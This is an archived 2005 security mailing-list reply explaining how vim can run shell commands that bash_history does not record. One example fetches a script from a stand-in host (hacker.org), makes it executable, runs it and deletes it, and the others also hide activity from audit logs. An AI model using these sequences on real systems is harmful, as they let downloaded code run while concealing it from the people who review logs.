Re: bash_history
From: Igor Plisco (plisco_at_ashmanov.com)
Date: 04/14/05
- Previous message: davidyu: "Re: fport on windows 2003 server"
- In reply to: Alejandro Flores: "bash_history"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 14 Apr 2005 18:49:40 +0400 To: security-basics@securityfocus.com
Ones upon a time Alejandro Flores shaped electrons to tell:
There are many other ways to hide shell commands. Consider following
simple vim examples:
$ vim
:! some_bad_command
or such:
$ vim
<some typing>
:w bad.sh
:!chmod +x %
:r !./%
:! rm %
or even such:
$ vim
:e http://hacker.org/bad_script.sh
:w bad.sh
:!chmod +x %
:r !./%
:! rm %
Igor Plisco
---------------------------------------------------------------------------
Earn your MS in Information Security ONLINE
Organizations worldwide are in need of highly qualified information security
professionals. Norwich University is fulfilling this demand with its MS in
Information Security offered online. Recognized by the NSA as an
academically excellent program, NU offers you the opportunity to earn your
degree without disrupting your home or work life.
http://www.msia.norwich.edu/secfocus_en
----------------------------------------------------------------------------
- Previous message: davidyu: "Re: fport on windows 2003 server"
- In reply to: Alejandro Flores: "bash_history"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]